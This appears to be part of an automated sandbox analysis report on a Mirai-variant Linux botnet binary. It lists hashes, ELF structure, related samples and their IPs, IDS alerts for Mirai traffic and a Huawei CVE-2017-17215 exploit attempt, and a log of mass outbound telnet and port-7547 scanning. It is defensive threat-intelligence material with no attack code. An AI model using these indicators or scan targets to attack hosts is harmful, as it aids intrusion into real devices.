                                          la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                          • 86.52.153.76
                                          splsh4.elfGet hashmaliciousUnknownBrowse
                                          • 212.10.113.162
                                          jade.m68k.elfGet hashmaliciousMiraiBrowse
                                          • 85.218.240.81
                                          la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                          • 85.218.240.73
                                          la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                                          • 85.218.240.13
                                          fOTHzKNyyk.elfGet hashmaliciousMiraiBrowse
                                          • 85.218.215.91
                                          sh4.elfGet hashmaliciousUnknownBrowse
                                          • 85.218.149.34
                                          ATT-MOBILITY-LLC-AS20057USsora.x86.elfGet hashmaliciousMiraiBrowse
                                          • 155.167.154.244
                                          sDX1AXN1Zp.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 166.172.104.117
                                          yakuza.sparc.elfGet hashmaliciousUnknownBrowse
                                          • 107.232.61.78
                                          IGz.arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 107.238.228.29
                                          nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 107.91.238.156
                                          arm.elfGet hashmaliciousMirai, GafgytBrowse
                                          • 166.203.133.222
                                          ppc.elfGet hashmaliciousMirai, GafgytBrowse
                                          • 166.206.30.112
                                          arm4.elfGet hashmaliciousMiraiBrowse
                                          • 32.182.236.209
                                          arm7.elfGet hashmaliciousMiraiBrowse
                                          • 166.216.208.159
                                          sora.sh4.elfGet hashmaliciousMiraiBrowse
                                          • 166.203.9.165
                                          CHINANET-BACKBONENo31Jin-rongStreetCNsora.arm7.elfGet hashmaliciousUnknownBrowse
                                          • 182.133.200.198
                                          sora.mpsl.elfGet hashmaliciousUnknownBrowse
                                          • 124.231.210.123
                                          sora.x86.elfGet hashmaliciousMiraiBrowse
                                          • 59.172.201.205
                                          nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 219.129.235.186
                                          8WdO7I87E1.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 122.242.114.152
                                          sDX1AXN1Zp.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 121.230.141.32
                                          9JvpARJbsQ.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 1.48.151.126
                                          pSU7fuySjo.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 120.43.74.96
                                          e5AiOG6uDI.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 123.52.17.160
                                          lB5MFPhwRY.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 182.246.139.229
                                          COMCAST-7922USsora.arm7.elfGet hashmaliciousUnknownBrowse
                                          • 66.240.47.35
                                          sora.mpsl.elfGet hashmaliciousUnknownBrowse
                                          • 69.142.24.93
                                          sora.x86.elfGet hashmaliciousMiraiBrowse
                                          • 96.120.58.54
                                          nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 73.203.127.122
                                          8WdO7I87E1.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 71.60.183.174
                                          sDX1AXN1Zp.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 73.42.70.6
                                          pSU7fuySjo.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 96.87.201.89
                                          e5AiOG6uDI.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 73.140.45.56
                                          lB5MFPhwRY.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 96.210.181.132
                                          C6IlHsFs4g.elfGet hashmaliciousMirai, MoobotBrowse
                                          • 96.138.131.170
                                          No context
                                          No context
                                          No created / dropped files found
                                          File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                                          Entropy (8bit):6.3516951894653655
                                          TrID:
                                          • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                          File name:debug.dbg.elf
                                          File size:103'152 bytes
                                          MD5:fd7cbd6075d33e1bf912805ccbe2621d
                                          SHA1:0dc9feeace2f76f3817d01119975c0aaa79bdf39
                                          SHA256:6916edeeb161b2302c0b346fb92227a44cfed51a98edacd275147f7926df341e
                                          SHA512:cab7de45e31ed35d2452ed74c103fb3e6ce6757eb5d6cb7858f38183a965d4a64f317bf2f32712dc31974c67a319989a9da826d0558b13b51fc14b825f49fea1
                                          SSDEEP:3072:JNqcMKnLinF0ZcQcWfH44lMJzVUGLvsjYh:TqcMKnOnu6Qca1lQVxL00h
                                          TLSH:1DA34B06B6C28CFEC06AD574266F6E36EC21F5EC0325B1A723D0BE252C5DE61261FB45
                                          File Content Preview:.ELF..............>.......@.....@.......p...........@.8...@.......................@.......@.....pz......pz................................Q.......Q.....0.......(...............Q.td....................................................H...._.....*..H........

                                          ELF header

                                          Class:ELF64
                                          Data:2's complement, little endian
                                          Version:1 (current)
                                          Machine:Advanced Micro Devices X86-64
                                          Version Number:0x1
                                          Type:EXEC (Executable file)
                                          OS/ABI:UNIX - System V
                                          ABI Version:0
                                          Entry Point Address:0x400194
                                          Flags:0x0
                                          ELF Header Size:64
                                          Program Header Offset:64
                                          Program Header Size:56
                                          Number of Program Headers:3
                                          Section Header Offset:102512
                                          Section Header Size:64
                                          Number of Section Headers:10
                                          Header String Table Index:9
                                          NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                          NULL0x00x00x00x00x0000
                                          .initPROGBITS0x4000e80xe80x130x00x6AX001
                                          .textPROGBITS0x4001000x1000x12ad60x00x6AX0016
                                          .finiPROGBITS0x412bd60x12bd60xe0x00x6AX001
                                          .rodataPROGBITS0x412c000x12c000x4e700x00x2A0032
                                          .ctorsPROGBITS0x5180000x180000x100x00x3WA008
                                          .dtorsPROGBITS0x5180100x180100x100x00x3WA008
                                          .dataPROGBITS0x5180400x180400xff00x00x3WA0032
                                          .bssNOBITS0x5190400x190300xace80x00x3WA0032
                                          .shstrtabSTRTAB0x00x190300x3e0x00x0001
                                          TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                          LOAD0x00x4000000x4000000x17a700x17a706.52410x5R E0x100000.init .text .fini .rodata
                                          LOAD0x180000x5180000x5180000x10300xbd282.79230x6RW 0x100000.ctors .dtors .data .bss
                                          GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-11-07T11:57:59.969455+01002029029ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.135925045.38.44.17547TCP
                                          2024-11-07T11:58:00.233412+01002029029ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.135152695.178.151.1097547TCP
                                          2024-11-07T11:58:03.396852+01002029029ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.134021461.64.58.1617547TCP
                                          2024-11-07T11:58:04.381224+01002029029ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.134070461.64.58.1617547TCP
                                          2024-11-07T11:58:05.469807+01002029029ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.135431074.194.189.2037547TCP
                                          2024-11-07T11:58:06.389000+01002835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)1192.168.2.1356436197.66.118.14437215TCP
                                          2024-11-07T11:58:06.404216+01002029029ET MALWARE Mirai Variant User-Agent (Outbound)1192.168.2.134923646.13.119.107547TCP
                                          TimestampSource PortDest PortSource IPDest IP
                                          Nov 7, 2024 11:57:58.385236025 CET33122323192.168.2.13144.38.180.55
                                          Nov 7, 2024 11:57:58.385256052 CET331223192.168.2.1390.214.208.149
                                          Nov 7, 2024 11:57:58.385268927 CET331223192.168.2.13154.239.175.19
                                          Nov 7, 2024 11:57:58.385268927 CET331223192.168.2.1346.245.97.144
                                          Nov 7, 2024 11:57:58.385282993 CET331223192.168.2.13198.227.183.55
                                          Nov 7, 2024 11:57:58.385282993 CET331223192.168.2.1312.155.172.52
                                          Nov 7, 2024 11:57:58.385292053 CET331223192.168.2.13187.228.170.8
                                          Nov 7, 2024 11:57:58.385302067 CET331223192.168.2.1392.13.69.124
                                          Nov 7, 2024 11:57:58.385304928 CET331223192.168.2.13220.188.148.202
                                          Nov 7, 2024 11:57:58.385304928 CET331223192.168.2.1360.114.104.239
                                          Nov 7, 2024 11:57:58.385304928 CET33122323192.168.2.13167.107.178.16
                                          Nov 7, 2024 11:57:58.385323048 CET331223192.168.2.13165.193.23.30
                                          Nov 7, 2024 11:57:58.385323048 CET331223192.168.2.13182.233.196.192
                                          Nov 7, 2024 11:57:58.385596991 CET331223192.168.2.13222.249.219.187
                                          Nov 7, 2024 11:57:58.385606050 CET331223192.168.2.13157.72.124.26
                                          Nov 7, 2024 11:57:58.385631084 CET331223192.168.2.13159.179.23.249
                                          Nov 7, 2024 11:57:58.385631084 CET331223192.168.2.13122.118.33.185
                                          Nov 7, 2024 11:57:58.385637045 CET331223192.168.2.1342.129.48.109
                                          Nov 7, 2024 11:57:58.385642052 CET331223192.168.2.13154.137.241.168
                                          Nov 7, 2024 11:57:58.385653973 CET331223192.168.2.1345.41.30.48
                                          Nov 7, 2024 11:57:58.385669947 CET331223192.168.2.13118.31.154.82
                                          Nov 7, 2024 11:57:58.385675907 CET331223192.168.2.13171.119.113.145
                                          Nov 7, 2024 11:57:58.385675907 CET331223192.168.2.13128.243.188.47
                                          Nov 7, 2024 11:57:58.385675907 CET33122323192.168.2.13160.165.32.120
                                          Nov 7, 2024 11:57:58.385699987 CET331223192.168.2.13161.29.101.223
                                          Nov 7, 2024 11:57:58.385699987 CET331223192.168.2.13128.52.175.122
                                          Nov 7, 2024 11:57:58.385704041 CET331223192.168.2.13160.219.200.63
                                          Nov 7, 2024 11:57:58.385714054 CET331223192.168.2.1378.185.19.227
                                          Nov 7, 2024 11:57:58.385714054 CET331223192.168.2.1340.117.107.0
                                          Nov 7, 2024 11:57:58.385720015 CET331223192.168.2.13196.205.138.120
                                          Nov 7, 2024 11:57:58.385720968 CET331223192.168.2.1386.224.145.190
                                          Nov 7, 2024 11:57:58.385721922 CET33122323192.168.2.13156.49.176.215
                                          Nov 7, 2024 11:57:58.385731936 CET331223192.168.2.13174.209.10.2
                                          Nov 7, 2024 11:57:58.385739088 CET331223192.168.2.13207.60.175.68
                                          Nov 7, 2024 11:57:58.385746956 CET331223192.168.2.1381.141.250.69
                                          Nov 7, 2024 11:57:58.385763884 CET331223192.168.2.13131.77.247.50
                                          Nov 7, 2024 11:57:58.385771036 CET331223192.168.2.13137.57.45.175
                                          Nov 7, 2024 11:57:58.385778904 CET331223192.168.2.13109.201.255.175
                                          Nov 7, 2024 11:57:58.385778904 CET331223192.168.2.13220.108.149.100
                                          Nov 7, 2024 11:57:58.385790110 CET33122323192.168.2.13193.51.5.71
                                          Nov 7, 2024 11:57:58.385792971 CET331223192.168.2.13171.193.98.94
                                          Nov 7, 2024 11:57:58.385796070 CET331223192.168.2.13112.72.49.159
                                          Nov 7, 2024 11:57:58.385802984 CET331223192.168.2.1380.180.18.98
                                          Nov 7, 2024 11:57:58.385802984 CET331223192.168.2.13180.96.78.149
                                          Nov 7, 2024 11:57:58.385807037 CET331223192.168.2.1312.215.142.86
                                          Nov 7, 2024 11:57:58.385818958 CET331223192.168.2.13180.155.178.33
                                          Nov 7, 2024 11:57:58.385828972 CET331223192.168.2.13162.236.208.131
                                          Nov 7, 2024 11:57:58.385832071 CET331223192.168.2.1380.226.118.23
                                          Nov 7, 2024 11:57:58.385847092 CET331223192.168.2.13106.130.68.178
                                          Nov 7, 2024 11:57:58.385855913 CET331223192.168.2.1379.132.89.112
                                          Nov 7, 2024 11:57:58.385857105 CET33122323192.168.2.13174.84.69.60
                                          Nov 7, 2024 11:57:58.385859013 CET331223192.168.2.1312.165.34.188
                                          Nov 7, 2024 11:57:58.385873079 CET331223192.168.2.13218.34.132.166
                                          Nov 7, 2024 11:57:58.385878086 CET331223192.168.2.1397.104.220.6
                                          Nov 7, 2024 11:57:58.385881901 CET331223192.168.2.1378.61.85.38
                                          Nov 7, 2024 11:57:58.385896921 CET331223192.168.2.13110.39.148.250
                                          Nov 7, 2024 11:57:58.385901928 CET331223192.168.2.13178.143.17.96
                                          Nov 7, 2024 11:57:58.385901928 CET331223192.168.2.13198.163.211.242
                                          Nov 7, 2024 11:57:58.385920048 CET331223192.168.2.1370.248.64.207
                                          Nov 7, 2024 11:57:58.385924101 CET33122323192.168.2.1396.163.172.32
                                          Nov 7, 2024 11:57:58.385924101 CET331223192.168.2.13223.150.241.220
                                          Nov 7, 2024 11:57:58.385932922 CET331223192.168.2.1377.38.54.150
                                          Nov 7, 2024 11:57:58.385932922 CET331223192.168.2.13142.121.147.161
                                          Nov 7, 2024 11:57:58.385936022 CET331223192.168.2.1371.234.3.59
                                          Nov 7, 2024 11:57:58.385938883 CET331223192.168.2.13152.55.102.238
                                          Nov 7, 2024 11:57:58.385945082 CET331223192.168.2.1366.163.190.7
                                          Nov 7, 2024 11:57:58.385958910 CET331223192.168.2.13211.203.171.23
                                          Nov 7, 2024 11:57:58.385965109 CET331223192.168.2.13138.105.105.159
                                          Nov 7, 2024 11:57:58.385965109 CET331223192.168.2.13129.3.14.255
                                          Nov 7, 2024 11:57:58.385977983 CET331223192.168.2.13131.37.133.39
                                          Nov 7, 2024 11:57:58.385978937 CET33122323192.168.2.13155.130.102.8
                                          Nov 7, 2024 11:57:58.385986090 CET331223192.168.2.13163.40.20.142
                                          Nov 7, 2024 11:57:58.385996103 CET331223192.168.2.1353.95.188.14
                                          Nov 7, 2024 11:57:58.385999918 CET331223192.168.2.1389.153.207.175
                                          Nov 7, 2024 11:57:58.386013031 CET331223192.168.2.13124.225.211.33
                                          Nov 7, 2024 11:57:58.386013985 CET331223192.168.2.1395.75.253.253
                                          Nov 7, 2024 11:57:58.386029959 CET331223192.168.2.1350.22.151.61
                                          Nov 7, 2024 11:57:58.386029959 CET331223192.168.2.1323.121.174.92
                                          Nov 7, 2024 11:57:58.386049986 CET331223192.168.2.13186.198.250.34
                                          Nov 7, 2024 11:57:58.386054993 CET331223192.168.2.132.168.80.181
                                          Nov 7, 2024 11:57:58.386069059 CET331223192.168.2.131.198.187.4
                                          Nov 7, 2024 11:57:58.386074066 CET331223192.168.2.13138.136.132.124
                                          Nov 7, 2024 11:57:58.386075020 CET331223192.168.2.13166.172.109.29
                                          Nov 7, 2024 11:57:58.386076927 CET33122323192.168.2.13102.61.117.64
                                          Nov 7, 2024 11:57:58.386089087 CET331223192.168.2.13110.218.241.154
                                          Nov 7, 2024 11:57:58.386092901 CET331223192.168.2.1373.123.25.202
                                          Nov 7, 2024 11:57:58.386101007 CET331223192.168.2.135.185.3.170
                                          Nov 7, 2024 11:57:58.386113882 CET331223192.168.2.1391.98.200.129
                                          Nov 7, 2024 11:57:58.386115074 CET331223192.168.2.13179.204.124.183
                                          Nov 7, 2024 11:57:58.386116982 CET33122323192.168.2.13176.133.64.66
                                          Nov 7, 2024 11:57:58.386120081 CET331223192.168.2.1368.27.161.2
                                          Nov 7, 2024 11:57:58.386132956 CET331223192.168.2.13116.96.35.22
                                          Nov 7, 2024 11:57:58.386132956 CET331223192.168.2.13145.145.81.5
                                          Nov 7, 2024 11:57:58.386135101 CET331223192.168.2.1372.215.189.23
                                          Nov 7, 2024 11:57:58.386152983 CET331223192.168.2.1398.108.52.182
                                          Nov 7, 2024 11:57:58.386157036 CET331223192.168.2.13109.42.181.206
                                          Nov 7, 2024 11:57:58.386166096 CET331223192.168.2.13181.143.145.183
                                          Nov 7, 2024 11:57:58.386167049 CET331223192.168.2.13141.71.122.189
                                          Nov 7, 2024 11:57:58.386168003 CET331223192.168.2.1341.198.39.179
                                          Nov 7, 2024 11:57:58.386181116 CET33122323192.168.2.1334.59.58.112
                                          Nov 7, 2024 11:57:58.386181116 CET331223192.168.2.13143.44.21.74
                                          Nov 7, 2024 11:57:58.386193991 CET331223192.168.2.1320.186.15.217
                                          Nov 7, 2024 11:57:58.386193991 CET331223192.168.2.13106.144.22.217
                                          Nov 7, 2024 11:57:58.386200905 CET331223192.168.2.13140.123.119.148
                                          Nov 7, 2024 11:57:58.386209011 CET331223192.168.2.1396.122.104.194
                                          Nov 7, 2024 11:57:58.386224031 CET331223192.168.2.1339.126.134.255
                                          Nov 7, 2024 11:57:58.386224985 CET331223192.168.2.13140.222.177.171
                                          Nov 7, 2024 11:57:58.386234999 CET331223192.168.2.13208.225.197.41
                                          Nov 7, 2024 11:57:58.386244059 CET331223192.168.2.13222.234.26.51
                                          Nov 7, 2024 11:57:58.386250019 CET33122323192.168.2.13160.119.41.32
                                          Nov 7, 2024 11:57:58.386254072 CET331223192.168.2.13219.252.233.75
                                          Nov 7, 2024 11:57:58.386262894 CET331223192.168.2.13203.168.134.90
                                          Nov 7, 2024 11:57:58.386264086 CET331223192.168.2.13212.29.234.147
                                          Nov 7, 2024 11:57:58.386274099 CET331223192.168.2.13163.239.11.206
                                          Nov 7, 2024 11:57:58.386281013 CET331223192.168.2.13200.80.114.98
                                          Nov 7, 2024 11:57:58.386285067 CET331223192.168.2.13130.179.92.147
                                          Nov 7, 2024 11:57:58.386288881 CET331223192.168.2.13137.135.163.109
                                          Nov 7, 2024 11:57:58.386295080 CET331223192.168.2.1337.94.103.123
                                          Nov 7, 2024 11:57:58.386307955 CET331223192.168.2.13186.34.188.19
                                          Nov 7, 2024 11:57:58.386318922 CET33122323192.168.2.13149.104.86.28
                                          Nov 7, 2024 11:57:58.386327028 CET331223192.168.2.13132.122.72.104
                                          Nov 7, 2024 11:57:58.386327028 CET331223192.168.2.1313.42.219.214
                                          Nov 7, 2024 11:57:58.386339903 CET331223192.168.2.13148.114.48.8
                                          Nov 7, 2024 11:57:58.386341095 CET331223192.168.2.13111.46.183.165
                                          Nov 7, 2024 11:57:58.386359930 CET331223192.168.2.1394.123.217.58
                                          Nov 7, 2024 11:57:58.386359930 CET331223192.168.2.13218.58.54.167
                                          Nov 7, 2024 11:57:58.386363029 CET331223192.168.2.13166.184.82.114
                                          Nov 7, 2024 11:57:58.386373043 CET331223192.168.2.13166.231.212.186
                                          Nov 7, 2024 11:57:58.386374950 CET331223192.168.2.13156.169.254.98
                                          Nov 7, 2024 11:57:58.386375904 CET331223192.168.2.1341.80.100.7
                                          Nov 7, 2024 11:57:58.386387110 CET33122323192.168.2.1362.9.17.161
                                          Nov 7, 2024 11:57:58.386387110 CET331223192.168.2.1320.34.176.29
                                          Nov 7, 2024 11:57:58.386403084 CET331223192.168.2.1366.152.197.165
                                          Nov 7, 2024 11:57:58.386409044 CET331223192.168.2.13190.156.246.135
                                          Nov 7, 2024 11:57:58.386418104 CET331223192.168.2.1323.49.239.94
                                          Nov 7, 2024 11:57:58.386419058 CET331223192.168.2.13108.82.161.35
                                          Nov 7, 2024 11:57:58.386420965 CET331223192.168.2.1391.240.139.180
                                          Nov 7, 2024 11:57:58.386425018 CET331223192.168.2.13158.20.153.133
                                          Nov 7, 2024 11:57:58.386435986 CET331223192.168.2.13176.119.8.245
                                          Nov 7, 2024 11:57:58.386436939 CET331223192.168.2.13200.53.9.66
                                          Nov 7, 2024 11:57:58.386446953 CET33122323192.168.2.13162.144.157.205
                                          Nov 7, 2024 11:57:58.386451960 CET331223192.168.2.1382.102.60.160
                                          Nov 7, 2024 11:57:58.386457920 CET331223192.168.2.13180.98.171.230
                                          Nov 7, 2024 11:57:58.386473894 CET331223192.168.2.1343.228.76.248
                                          Nov 7, 2024 11:57:58.386476040 CET331223192.168.2.13140.10.186.245
                                          Nov 7, 2024 11:57:58.386476040 CET331223192.168.2.1379.33.66.94
                                          Nov 7, 2024 11:57:58.386506081 CET331223192.168.2.1368.228.161.53
                                          Nov 7, 2024 11:57:58.386506081 CET33122323192.168.2.1385.20.22.132
                                          Nov 7, 2024 11:57:58.386507034 CET331223192.168.2.13102.68.197.1
                                          Nov 7, 2024 11:57:58.386506081 CET331223192.168.2.1346.110.190.173
                                          Nov 7, 2024 11:57:58.386507034 CET331223192.168.2.13162.229.126.224
                                          Nov 7, 2024 11:57:58.386506081 CET331223192.168.2.13134.136.170.6
                                          Nov 7, 2024 11:57:58.386508942 CET331223192.168.2.13101.161.93.8
                                          Nov 7, 2024 11:57:58.386508942 CET331223192.168.2.13203.163.21.113
                                          Nov 7, 2024 11:57:58.386507988 CET331223192.168.2.13105.248.177.136
                                          Nov 7, 2024 11:57:58.386507988 CET331223192.168.2.13124.195.117.4
                                          Nov 7, 2024 11:57:58.386512995 CET331223192.168.2.1363.88.154.167
                                          Nov 7, 2024 11:57:58.386512995 CET331223192.168.2.13152.79.53.83
                                          Nov 7, 2024 11:57:58.386512995 CET331223192.168.2.13113.188.89.219
                                          Nov 7, 2024 11:57:58.386512995 CET331223192.168.2.1343.92.156.11
                                          Nov 7, 2024 11:57:58.389113903 CET30567547192.168.2.13168.30.180.55
                                          Nov 7, 2024 11:57:58.389120102 CET30567547192.168.2.13198.219.183.55
                                          Nov 7, 2024 11:57:58.389120102 CET30567547192.168.2.13165.239.16.148
                                          Nov 7, 2024 11:57:58.389133930 CET30567547192.168.2.13203.84.99.53
                                          Nov 7, 2024 11:57:58.389173031 CET30567547192.168.2.13218.4.9.0
                                          Nov 7, 2024 11:57:58.389173031 CET30567547192.168.2.13173.66.213.27
                                          Nov 7, 2024 11:57:58.389173031 CET30567547192.168.2.13161.120.27.203
                                          Nov 7, 2024 11:57:58.389173031 CET30567547192.168.2.13178.51.106.237
                                          Nov 7, 2024 11:57:58.389173031 CET30567547192.168.2.13164.23.110.18
                                          Nov 7, 2024 11:57:58.389175892 CET30567547192.168.2.1345.38.44.1
                                          Nov 7, 2024 11:57:58.389200926 CET30567547192.168.2.1395.245.103.118
                                          Nov 7, 2024 11:57:58.389200926 CET30567547192.168.2.13144.24.215.144
                                          Nov 7, 2024 11:57:58.389200926 CET30567547192.168.2.13145.65.108.245
                                          Nov 7, 2024 11:57:58.389206886 CET30567547192.168.2.1358.52.165.16
                                          Nov 7, 2024 11:57:58.389209032 CET30567547192.168.2.1378.190.240.127
                                          Nov 7, 2024 11:57:58.389210939 CET30567547192.168.2.135.8.101.228
                                          Nov 7, 2024 11:57:58.389209032 CET30567547192.168.2.1320.208.34.62
                                          Nov 7, 2024 11:57:58.389210939 CET30567547192.168.2.13102.191.171.160
                                          Nov 7, 2024 11:57:58.389209032 CET30567547192.168.2.13156.78.209.36
                                          Nov 7, 2024 11:57:58.389214993 CET30567547192.168.2.13207.86.105.37
                                          Nov 7, 2024 11:57:58.389224052 CET30567547192.168.2.1366.163.163.254
                                          Nov 7, 2024 11:57:58.389225006 CET30567547192.168.2.13197.131.140.8
                                          Nov 7, 2024 11:57:58.389231920 CET30567547192.168.2.1395.178.151.109
                                          Nov 7, 2024 11:57:58.389245033 CET30567547192.168.2.134.230.209.133
                                          Nov 7, 2024 11:57:58.389245033 CET30567547192.168.2.13201.250.120.24
                                          Nov 7, 2024 11:57:58.389256954 CET30567547192.168.2.1334.183.63.81
                                          Nov 7, 2024 11:57:58.389257908 CET30567547192.168.2.13217.144.32.43
                                          Nov 7, 2024 11:57:58.389269114 CET30567547192.168.2.13167.183.152.2
                                          Nov 7, 2024 11:57:58.389286995 CET30567547192.168.2.13182.58.1.242
                                          Nov 7, 2024 11:57:58.389286995 CET30567547192.168.2.13219.44.145.4
                                          Nov 7, 2024 11:57:58.389302015 CET30567547192.168.2.13128.254.238.51
                                          Nov 7, 2024 11:57:58.389307022 CET30567547192.168.2.13194.122.191.22
                                          Nov 7, 2024 11:57:58.389307022 CET30567547192.168.2.13199.58.155.75
                                          Nov 7, 2024 11:57:58.389341116 CET30567547192.168.2.13167.210.14.28
                                          Nov 7, 2024 11:57:58.389343977 CET30567547192.168.2.13216.224.7.248
                                          Nov 7, 2024 11:57:58.389364004 CET30567547192.168.2.1346.158.79.209
                                          Nov 7, 2024 11:57:58.389369965 CET30567547192.168.2.13193.23.8.185
                                          Nov 7, 2024 11:57:58.389385939 CET30567547192.168.2.1323.91.39.87
                                          Nov 7, 2024 11:57:58.389385939 CET30567547192.168.2.13118.8.12.219
                                          Nov 7, 2024 11:57:58.389388084 CET30567547192.168.2.13170.242.186.244
                                          Nov 7, 2024 11:57:58.389394045 CET30567547192.168.2.13110.211.19.120
                                          Nov 7, 2024 11:57:58.389399052 CET30567547192.168.2.1382.217.130.144
                                          Nov 7, 2024 11:57:58.389399052 CET30567547192.168.2.1361.64.58.161
                                          Nov 7, 2024 11:57:58.389410019 CET30567547192.168.2.13188.192.33.17
                                          Nov 7, 2024 11:57:58.389410973 CET30567547192.168.2.13200.216.17.231
                                          Nov 7, 2024 11:57:58.389419079 CET30567547192.168.2.1388.52.144.208
                                          Nov 7, 2024 11:57:58.389420986 CET30567547192.168.2.1343.168.39.9
                                          Nov 7, 2024 11:57:58.389431953 CET30567547192.168.2.1344.213.15.85
                                          Nov 7, 2024 11:57:58.389439106 CET30567547192.168.2.13143.249.137.26
                                          Nov 7, 2024 11:57:58.389445066 CET30567547192.168.2.13143.242.231.169
                                          Nov 7, 2024 11:57:58.389451981 CET30567547192.168.2.13144.182.249.102
                                          Nov 7, 2024 11:57:58.389456034 CET30567547192.168.2.1346.229.152.199
                                          Nov 7, 2024 11:57:58.389456987 CET30567547192.168.2.1375.183.209.41
                                          Nov 7, 2024 11:57:58.389471054 CET30567547192.168.2.13159.248.124.230
                                          Nov 7, 2024 11:57:58.389472008 CET30567547192.168.2.13135.130.179.126
                                          Nov 7, 2024 11:57:58.389481068 CET30567547192.168.2.13163.7.213.125
                                          Nov 7, 2024 11:57:58.389486074 CET30567547192.168.2.1387.74.210.177
                                          Nov 7, 2024 11:57:58.389492035 CET30567547192.168.2.1389.88.8.86
                                          Nov 7, 2024 11:57:58.389522076 CET30567547192.168.2.13164.67.111.183
                                          Nov 7, 2024 11:57:58.389522076 CET30567547192.168.2.13141.151.90.91
                                          Nov 7, 2024 11:57:58.389523983 CET30567547192.168.2.13220.47.31.232
                                          Nov 7, 2024 11:57:58.389527082 CET30567547192.168.2.13183.59.129.150
                                          Nov 7, 2024 11:57:58.389527082 CET30567547192.168.2.1371.254.190.14
                                          Nov 7, 2024 11:57:58.389539003 CET30567547192.168.2.13217.63.48.206
                                          Nov 7, 2024 11:57:58.389539957 CET30567547192.168.2.13157.4.219.114
                                          Nov 7, 2024 11:57:58.389539003 CET30567547192.168.2.1354.8.114.143
                                          Nov 7, 2024 11:57:58.389544010 CET30567547192.168.2.13151.92.176.195
                                          Nov 7, 2024 11:57:58.389544010 CET30567547192.168.2.1363.214.81.242
                                          Nov 7, 2024 11:57:58.389550924 CET30567547192.168.2.13111.181.107.200
                                          Nov 7, 2024 11:57:58.389554977 CET30567547192.168.2.13170.246.41.239
                                          Nov 7, 2024 11:57:58.389564991 CET30567547192.168.2.1360.50.40.24
                                          Nov 7, 2024 11:57:58.389569998 CET30567547192.168.2.13200.220.184.47
                                          Nov 7, 2024 11:57:58.389569998 CET30567547192.168.2.13119.15.235.117
                                          Nov 7, 2024 11:57:58.389575958 CET30567547192.168.2.13207.191.93.18
                                          Nov 7, 2024 11:57:58.389578104 CET30567547192.168.2.13113.16.91.104
                                          Nov 7, 2024 11:57:58.389590025 CET30567547192.168.2.13154.243.140.107
                                          Nov 7, 2024 11:57:58.389605045 CET30567547192.168.2.13179.156.39.112
                                          Nov 7, 2024 11:57:58.389605045 CET30567547192.168.2.1325.180.136.110
                                          Nov 7, 2024 11:57:58.389611959 CET30567547192.168.2.13196.82.25.195
                                          Nov 7, 2024 11:57:58.389621019 CET30567547192.168.2.1394.211.181.228
                                          Nov 7, 2024 11:57:58.389624119 CET30567547192.168.2.1345.86.223.252
                                          Nov 7, 2024 11:57:58.389630079 CET30567547192.168.2.1312.227.129.205
                                          Nov 7, 2024 11:57:58.389647007 CET30567547192.168.2.1336.100.155.213
                                          Nov 7, 2024 11:57:58.389647961 CET30567547192.168.2.13125.224.153.83
                                          Nov 7, 2024 11:57:58.389647007 CET30567547192.168.2.13168.91.93.207
                                          Nov 7, 2024 11:57:58.389658928 CET30567547192.168.2.1349.118.84.185
                                          Nov 7, 2024 11:57:58.389662027 CET30567547192.168.2.13183.17.244.147
                                          Nov 7, 2024 11:57:58.389672995 CET30567547192.168.2.1396.117.154.154
                                          Nov 7, 2024 11:57:58.389672995 CET30567547192.168.2.1387.255.173.58
                                          Nov 7, 2024 11:57:58.389682055 CET30567547192.168.2.13212.189.208.120
                                          Nov 7, 2024 11:57:58.389682055 CET30567547192.168.2.13168.224.216.61
                                          Nov 7, 2024 11:57:58.389688969 CET30567547192.168.2.1350.87.7.55
                                          Nov 7, 2024 11:57:58.389688969 CET30567547192.168.2.13112.195.60.88
                                          Nov 7, 2024 11:57:58.389693022 CET30567547192.168.2.13131.163.155.211
                                          Nov 7, 2024 11:57:58.389702082 CET30567547192.168.2.13125.174.179.196
                                          Nov 7, 2024 11:57:58.389702082 CET30567547192.168.2.13120.40.32.246
                                          Nov 7, 2024 11:57:58.389704943 CET30567547192.168.2.1319.99.100.131
                                          Nov 7, 2024 11:57:58.389714003 CET30567547192.168.2.13149.74.215.82
                                          Nov 7, 2024 11:57:58.389719009 CET30567547192.168.2.1342.60.65.173
                                          Nov 7, 2024 11:57:58.389731884 CET30567547192.168.2.1341.214.75.116
                                          Nov 7, 2024 11:57:58.389740944 CET30567547192.168.2.135.95.37.45
                                          Nov 7, 2024 11:57:58.389740944 CET30567547192.168.2.1396.15.231.52
                                          Nov 7, 2024 11:57:58.389740944 CET30567547192.168.2.13143.237.119.157
                                          Nov 7, 2024 11:57:58.389740944 CET30567547192.168.2.13161.243.235.100
                                          Nov 7, 2024 11:57:58.389745951 CET30567547192.168.2.13169.58.8.202
